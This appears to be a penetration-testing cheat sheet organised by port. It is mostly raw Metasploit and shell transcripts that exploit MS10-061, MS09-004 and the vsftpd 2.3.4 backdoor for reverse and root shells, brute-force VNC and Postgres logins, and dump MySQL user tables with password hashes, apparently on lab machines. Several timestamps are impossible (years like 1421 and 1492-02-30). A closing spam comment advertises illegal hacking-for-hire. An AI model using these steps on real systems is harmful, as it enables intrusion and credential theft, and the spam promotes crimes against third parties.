This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References:
http://www.osvdb.org/67988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
msf exploit(ms10_061_spoolss) > set rhost Remote-IP-Address
msf exploit(ms10_061_spoolss) > exploit
[*] Started reverse handler on Local-IP-Address:4444
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\IP-Address\PWN-AGFA-Acc ...
[*] Printer handle: 000000008493a66b538fa546865d85bb85e8f036
[*] Job started: 0x2
[*] Wrote 73802 bytes to %SystemRoot%\system32\pDeC6njEHgezu5.exe
[*] Job started: 0x3
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\9Y3E56ufs7KWqm.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (752128 bytes) to Remote-IP-Address
[*] Meterpreter session 4 opened (Local-IP-Address:4444 -> Remote-IP-Address:1033) at 1476-12-06 17:24:48 +0000
meterpreter >
----------------------------------------------------------------------------------
port 1433 - ms-sql-s (win)
msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address
lhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address
rhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit
[*] Started reverse handler on IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to IP-Address
[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100
----------------------------------------------------------------------------------
port 5900 - vnc (win/linux)
root@bt:~# nmap -sS -sC -p 5900 IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
5900/tcp open vnc
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
MAC Address: 08:00:27:EB:18:CC (Micky Systems)
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt
msf auxiliary(vnc_login) > set rhosts IP-Address
msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3
msf auxiliary(vnc_login) > run
[*] IP-Address:5900 - Starting VNC login sweep
[*] IP-Address:5900 VNC - [01/18] - Attempting VNC login with password ''
[*] IP-Address:5900 VNC - [01/18] - , VNC server protocol version : 3.3
[-] IP-Address:5900 VNC - [01/18] - , Authentication failed
[*] IP-Address:5900 VNC - [02/18] - Attempting VNC login with password 'password'
[*] IP-Address:5900 VNC - [02/18] - , VNC server protocol version : 3.3
[+] IP-Address:5900, VNC server password : "password"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
2. Open vncviewer or tsclient
root@bt:~# vncviewer ip-address:5900
root@bt:~# tsclient
Computer = IP-Address
Protocol = VNC
Username = leave blank
Press connect
3. A Password box will open type in password press enter.
port 8180 - tomcat_mgr_login (win/linux)
----------------------------------------------------------------------------------
port 5432 - postgresql (linux)
root@bt:~# nmap -sV -p 22,5432 --open Remote-IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-05 15:46 BST
Nmap scan report for Remote-IP-Address
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 01:02:03:04:05:06 (Micky Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds
msf > search PostgreSQL
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload 2009-04-10 00:00:00 UTC excellent PostgreSQL for Microsoft Windows Payload Execution
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts Remote-IP-Address
msf auxiliary(postgres_login) > exploit
[*] Remote-IP-Address:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'postgres':''
[-] Remote-IP-Address:5432 Postgres - [01/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':''
[-] Remote-IP-Address:5432 Postgres - [02/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':''
[-] Remote-IP-Address:5432 Postgres - [03/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':''
[-] Remote-IP-Address:5432 Postgres - [04/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] Remote-IP-Address:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] Remote-IP-Address:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Remote-IP-Address:5432 Postgres - Disconnected
[*] Remote-IP-Address:5432 Postgres - [06/21] - Trying username:'scott' with password:'scott' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'scott'
[-] Remote-IP-Address:5432 Postgres - [06/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [07/21] - Trying username:'admin' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'admin'
[-] Remote-IP-Address:5432 Postgres - [07/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [08/21] - Trying username:'admin' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'password'
[-] Remote-IP-Address:5432 Postgres - [08/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [09/21] - Trying username:'' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'tiger'
[-] Remote-IP-Address:5432 Postgres - [09/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [10/21] - Trying username:'' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'postgres'
[-] Remote-IP-Address:5432 Postgres - [10/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [11/21] - Trying username:'' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'password'
[-] Remote-IP-Address:5432 Postgres - [11/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [12/21] - Trying username:'' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'admin'
[-] Remote-IP-Address:5432 Postgres - [12/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [13/21] - Trying username:'scott' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'tiger'
[-] Remote-IP-Address:5432 Postgres - [13/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [14/21] - Trying username:'scott' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'postgres'
[-] Remote-IP-Address:5432 Postgres - [14/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [15/21] - Trying username:'scott' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'password'
[-] Remote-IP-Address:5432 Postgres - [15/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [16/21] - Trying username:'scott' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'admin'
[-] Remote-IP-Address:5432 Postgres - [16/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [17/21] - Trying username:'admin' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'tiger'
[-] Remote-IP-Address:5432 Postgres - [17/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [18/21] - Trying username:'admin' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'postgres'
[-] Remote-IP-Address:5432 Postgres - [18/21] - Username/Password failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) >
root@bt:~# psql -h Remote-IP-Address -U postgres -W
Password for user postgres: postgres
psql (8.4.8, server 8.3.1)
WARNING: psql version 8.4, server version 8.3.
Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.
postgres=#
----------------------------------------------------------------------------------
port 25 - smtp
root@bt:~# nmap --script smtp-enum-users.nse -p 25,465,587 IP-Address
Starting Nmap 6.01 ( http://nmap.org ) at 1421-11-21 09:57 GMT
Nmap scan report for IP-Address
Host is up (0.00082s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
465/tcp closed smtps
587/tcp closed submission
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)
----------------------------------------------------------------------------------
port 3306 - mysql (linux)
root@bt:/usr/local/share/nmap/scripts# nmap -p 3306 --script mysql-empty-password.nse External-IP-Address
Starting Nmap 6.25 ( http://nmap.org ) at 1741-01-04 17:19 GMT
Nmap scan report for External-IP-Address
Host is up (0.00053s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-empty-password:
|_ root account has empty password
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds
root@bt:/usr/local/share/nmap/scripts# mysql --host=External-IP-Address
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.01 sec)
mysql> use dvwa;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.01 sec)
mysql> SELECT * FROM users;
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://IP-Address/dvwa/hackable/users/gordonb.jpg |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://IP-Address/dvwa/hackable/users/1337.jpg |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://IP-Address/dvwa/hackable/users/pablo.jpg |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/smithy.jpg |
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
5 rows in set (0.00 sec)
mysql>
mysql>
mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts |
| blogs_table |
| captured_data |
| credit_cards |
| hitlog |
| pen_test_tools |
+-------------------+
6 rows in set (0.00 sec)
mysql> SELECT * FROM accounts;
+-----+----------+--------------+-----------------------------+----------+
| cid | username | password | mysignature | is_admin |
+-----+----------+--------------+-----------------------------+----------+
| 1 | admin | adminpass | Monkey! | TRUE |
| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |
| 3 | john | monkey | I like the smell of confunk | FALSE |
| 4 | jeremy | password | d1373 1337 speak | FALSE |
| 5 | bryce | password | I Love SANS | FALSE |
| 6 | samurai | samurai | Carving Fools | FALSE |
| 7 | jim | password | Jim Rome is Burning | FALSE |
| 8 | bobby | password | Hank is my dad | FALSE |
| 9 | simba | password | I am a cat | FALSE |
| 10 | dreveil | password | Preparation H | FALSE |
| 11 | scotty | password | Scotty Do | FALSE |
| 12 | cal | password | Go Wildcats | FALSE |
| 13 | john | password | Do the Duggie! | FALSE |
| 14 | kevin | 42 | Doug Adams rocks | FALSE |
| 15 | dave | set | Bet on S.E.T. FTW | FALSE |
| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |
+-----+----------+--------------+-----------------------------+----------+
16 rows in set (0.18 sec)
mysql>
----------------------------------------------------------------------------------
port 21 - FTP (linux)
root@bt:~# nmap -sC -sT -v IP-Address
PORT STATE SERVICE
21/tcp open ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
------------------------------------------------
msf auxiliary(vnc_login) > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set rhosts IP-Address
msf auxiliary(ftp_version) > run
[*] IP-Address:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
------------------------------------------------
msf auxiliary(ftp_version) > search vsFTPd
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution
------------------------------------------------
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set rhost IP-Address
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (IP-Address:44113 -> IP-Address:6200) at 1421-01-12 01:45:51 +0000
ls -l
drwxr-xr-x 2 root root 4096 May 13 1421 bin
drwxr-xr-x 4 root root 1024 May 13 1421 boot
lrwxrwxrwx 1 root root 11 Apr 28 1421 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Jan 25 05:46 dev
drwxr-xr-x 95 root root 4096 Jan 25 05:47 etc
drwxr-xr-x 6 root root 4096 Apr 16 1421 home
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com